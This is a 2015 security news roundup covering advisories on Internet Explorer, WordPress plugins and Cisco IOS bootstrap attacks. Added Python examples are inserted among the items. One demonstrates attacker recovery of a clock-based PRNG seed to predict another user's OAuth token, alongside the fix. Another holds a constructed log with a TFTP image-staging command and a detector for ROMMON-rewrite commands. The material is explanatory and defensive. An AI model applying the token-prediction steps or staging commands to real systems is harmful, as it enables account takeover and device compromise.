Debian Linux Security Advisory 3332-1 – Several vulnerabilities have been fixed in WordPress, the popular blogging engine.
Monthly Archives: August 2015
BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability
Posted by Blue Frost Security Research Lab on Aug 12
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/
research(at)bluefrostsecurity.de
BFS-SA-2015-001 12-August-2015
Re: Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plugin)
Posted by dxw Security on Aug 12
Ah yes – sorry about that. Should indeed be 2015-08-10
I've corrected it in our published advisory:
https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/
Thanks for letting me know
—
Duncan Stuart (@dgmstuart)
Head of Products, dxw
Exemplary web projects for the public sector
The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure (WordPress plugin)
Posted by dxw Security on Aug 12
Details
================
Software: OAuth2 Complete For WordPress
Version: 3.1.3
Homepage: http://wordpress.org/plugins/oauth2-provider/
Advisory report:
https://security.dxw.com/advisories/the-oauth2-complete-plugin-for-wordpress-uses-a-pseudorandom-number-generator-which-is-non-cryptographically-secure/
CVE: Awaiting assignment
CVSS: 10 (High; AV:N/AC:L/Au:N/C:C/I:C/A:C)
Description
================
The OAuth2 Complete plugin for WordPress…
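The advisory text is cut off above, but the vulnerability class is clear: tokens drawn from a non-cryptographic PRNG are predictable. What follows is an added example and not code from the OAuth2 Complete plugin (which is PHP; Python's Mersenne Twister-based `random` module stands in for a non-CSPRNG here, with `secrets` as the fix). The token format, the clock-derived seed, the timestamps and the search window are assumptions for illustration.

```python
import random
import secrets


def weak_token(seed, nbytes=16):
    """Hypothetical token generator: hex string from Python's Mersenne Twister
    (random.Random), a fast but NON-cryptographic PRNG. Stands in for a plugin
    that builds OAuth tokens from mt_rand()/rand()-style output."""
    rng = random.Random(seed)
    return "".join(f"{rng.getrandbits(8):02x}" for _ in range(nbytes))


def issue_weak_token(issue_time):
    """Seeding from the clock (a common pattern, assumed here) leaves only a few
    thousand plausible seeds per hour, so the whole token follows from the time."""
    return weak_token(int(issue_time))


def recover_seed(known_token, approx_time, window=60):
    """Attacker step 1: brute-force the seed around the time the attacker's OWN
    token was issued (known, since the attacker requested it)."""
    centre = int(approx_time)
    for seed in range(centre - window, centre + window + 1):
        if weak_token(seed) == known_token:
            return seed
    return None


def predict_token(own_token, own_issue_time, victim_issue_time, window=60):
    """Attacker step 2: with the seed scheme confirmed, any other token issued at
    a known or guessable time is reproducible without ever seeing it."""
    seed = recover_seed(own_token, own_issue_time, window)
    if seed is None:
        return None
    return weak_token(seed + (int(victim_issue_time) - int(own_issue_time)))


def strong_token(nbytes=32):
    """Fix: draw from the OS CSPRNG. secrets.token_hex is the Python analogue of
    PHP's random_bytes() / openssl_random_pseudo_bytes() followed by bin2hex()."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    T = 1439366400  # constructed issue time (2015-08-12 08:00:00 UTC)
    mine = issue_weak_token(T)
    victim = issue_weak_token(T + 7)  # victim authorised seven seconds later
    print("predicted victim token matches:", predict_token(mine, T, T + 7) == victim)
    print("strong token:", strong_token())
```

The brute force above is tiny (a two-minute window) because the seed is the clock; a 32-bit seed is still only about four billion candidates, which is minutes of work offline. The fix is not a larger seed but an unpredictable source, which is what the CSPRNG call provides.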
Open source tool for applying Google Chrome security updates
Posted by David Leo on Aug 12
The Problem
If you are a network administrator, keeping browsers updated is the first thing to do for security. Chrome is a very good browser, but it is surprisingly complicated to answer a simple question: what is the version of the latest stable Chrome? And for people in places such as China (no Google services), updating Chrome is not an easy task.
The Solution
The official blog of Chrome Releases contains a lot of information. Code of…
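To make the "latest stable Chrome" question concrete, here is an added example that is not the announced tool (whose code is cut off above). It scans constructed post titles and opening lines written in the style of the Chrome Releases blog, keeps only the desktop stable-channel posts, and picks the newest version by numeric comparison, the pitfall being that a plain string compare ranks 44.0.2403.89 above 44.0.2403.130. The sample posts and version numbers are constructed for illustration.

```python
import re

# Constructed sample in the style of Chrome Releases blog post titles and opening
# lines (illustrative only: these are not real posts and the numbers are made up).
SAMPLE_POSTS = [
    ("Stable Channel Update",
     "The stable channel has been updated to 44.0.2403.130 for Windows, Mac, and Linux."),
    ("Beta Channel Update",
     "The beta channel has been updated to 45.0.2454.37 for Windows, Mac, and Linux."),
    ("Stable Channel Update",
     "The Chrome team is delighted to announce the promotion of Chrome 44 to the stable "
     "channel. Chrome 44.0.2403.89 contains a number of fixes and improvements."),
    ("Stable Channel Update for Chrome OS",
     "The Stable channel has been updated to 44.0.2403.133 (Platform version: 7077.124.0)."),
    ("Dev Channel Update",
     "The dev channel has been updated to 46.0.2471.2 for Windows, Mac, and Linux."),
]

# Chrome versions are four dotted integers; three-part platform numbers are ignored.
VERSION_RE = re.compile(r"\b\d+\.\d+\.\d+\.\d+\b")


def parse_version(text):
    """'44.0.2403.130' -> (44, 0, 2403, 130); tuples compare component-wise."""
    return tuple(int(p) for p in text.split("."))


def stable_desktop_versions(posts):
    """Versions mentioned in desktop stable-channel posts, in post order."""
    out = []
    for title, body in posts:
        t = title.lower()
        if not t.startswith("stable channel") or "chrome os" in t:
            continue
        out.extend(parse_version(m.group(0)) for m in VERSION_RE.finditer(body))
    return out


def latest_stable(posts):
    """Highest desktop stable version as a dotted string, or None if no post matched."""
    versions = stable_desktop_versions(posts)
    return ".".join(map(str, max(versions))) if versions else None


def is_outdated(installed, posts):
    """True if the installed build is older than the newest stable release seen."""
    latest = latest_stable(posts)
    return latest is not None and parse_version(installed) < parse_version(latest)


if __name__ == "__main__":
    print("latest stable:", latest_stable(SAMPLE_POSTS))
    print("44.0.2403.89 outdated:", is_outdated("44.0.2403.89", SAMPLE_POSTS))
```

Feeding this from the live blog (fetching the feed and splitting it into title/body pairs) is left out so the block runs offline; the filtering and comparison logic is the part that tends to go wrong in ad-hoc scripts.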
Cisco Warns Customers About Attacks Installing Malicious IOS Bootstrap Images
Cisco is warning enterprise customers about a spike in attacks in which hackers use valid credentials on IOS devices to log in as administrators and then upload malicious ROMMON images to take control of the devices. The ROM Monitor is the program that initializes the hardware and software on IOS devices, and an attacker who […]
Evolution in Attacks Against Cisco IOS Software Platforms
Original release date: August 12, 2015
Cisco has observed increasingly complex attacks that could allow an attacker to gain administrative access to a Cisco IOS device by installing a malicious ROMMON image. Successful exploitation using this image could allow an attacker to manipulate device behavior after the device is rebooted.
US-CERT encourages users and administrators to review the Cisco Security Activity Bulletin and apply recommendations to protect Cisco IOS devices.
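The two items above describe the same technique: an attacker who already holds valid administrative credentials installs a replacement ROMMON bootstrap image, and the change survives reboots. What follows is an added example, not Cisco's or US-CERT's code, of the kind of check an operator can script against device output: it parses a `show version` excerpt, compares ROMMON version, IOS version and system image against a recorded baseline, and scans command-accounting records for the `upgrade rom-monitor` command and the `copy` that usually precedes it. The `show version` excerpt, the baseline values and the accounting lines are constructed for illustration, so their exact layout is an assumption.

```python
import re

# Constructed excerpt in the style of Cisco IOS "show version" (illustrative;
# versions and image name are made up, not taken from a real device).
SAMPLE_SHOW_VERSION = """\
Cisco IOS Software, C2900 Software (C2900-UNIVERSALK9-M), Version 15.4(3)M3, RELEASE SOFTWARE (fc2)
ROM: System Bootstrap, Version 15.0(1r)M16, RELEASE SOFTWARE (fc1)
router uptime is 2 hours, 14 minutes
System returned to ROM by reload
System image file is "flash0:c2900-universalk9-mz.SPA.154-3.M3.bin"
"""

# Golden values recorded from a known-good device of the same model
# (constructed here; in practice they come from your own inventory).
BASELINE = {
    "rommon": "15.0(1r)M16",
    "ios": "15.4(3)M3",
    "image": "flash0:c2900-universalk9-mz.SPA.154-3.M3.bin",
}

# Constructed command-accounting records (rough style of TACACS+ "cmd=" accounting).
SAMPLE_ACCOUNTING = [
    "Aug 12 2015 09:14:02 192.0.2.1 user=netops cmd=show version",
    "Aug 12 2015 09:15:40 192.0.2.1 user=netops cmd=copy tftp://198.51.100.7/rommon.bin flash0:",
    "Aug 12 2015 09:16:05 192.0.2.1 user=netops cmd=upgrade rom-monitor file flash0:rommon.bin",
    "Aug 12 2015 09:16:30 192.0.2.1 user=netops cmd=reload",
]

FIELD_PATTERNS = {
    "ios": re.compile(r"^Cisco IOS Software.*?Version ([^,]+),", re.M),
    "rommon": re.compile(r"^ROM: .*?Version ([^,]+),", re.M),
    "image": re.compile(r'^System image file is "([^"]+)"', re.M),
}


def parse_show_version(text):
    """Pull the fields a bootstrap-tampering check cares about."""
    info = {}
    for key, pattern in FIELD_PATTERNS.items():
        m = pattern.search(text)
        if m:
            info[key] = m.group(1).strip()
    return info


def check_against_baseline(info, baseline):
    """Findings as 'field: got X, expected Y'; an empty list means the device matches.
    A ROMMON change with no matching change order is the signal to chase."""
    return [f"{k}: got {info.get(k)!r}, expected {baseline[k]!r}"
            for k in ("rommon", "ios", "image") if info.get(k) != baseline[k]]


SUSPICIOUS_CMDS = [
    ("high", re.compile(r"cmd=upgrade rom-monitor\b")),  # rewrites the bootstrap ROM
    ("medium", re.compile(r"cmd=copy \S+ flash\d*:")),   # stages an image on flash first
]


def flag_accounting(lines):
    """(severity, line) for commands that stage or install bootstrap code."""
    return [(sev, ln) for ln in lines for sev, pat in SUSPICIOUS_CMDS if pat.search(ln)]


if __name__ == "__main__":
    print(check_against_baseline(parse_show_version(SAMPLE_SHOW_VERSION), BASELINE))
    for sev, ln in flag_accounting(SAMPLE_ACCOUNTING):
        print(sev.upper(), ln)
```

Because the attacker logs in with real credentials, the authentication logs look normal; the two places the activity does show up are the device state (a ROMMON or image string that no longer matches inventory) and command accounting, which only helps if it is enabled and shipped off the box before the reload.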
Corvette hacked with a text message
Researchers have hacked into a Corvette with a simple text message, taking control over its brakes.
The post Corvette hacked with a text message appeared first on We Live Security.
RHBA-2015:1588-1: Red Hat OpenShift Enterprise 2.0.9 bug fix update
Red Hat Enterprise Linux: Red Hat OpenShift Enterprise release 2.0.9 is now available with updated packages that fix several bugs.
RHEA-2015:1600-1: new packages: kmod-iwlwifi
Red Hat Enterprise Linux: New kmod-iwlwifi packages are now available for Red Hat Enterprise Linux 6.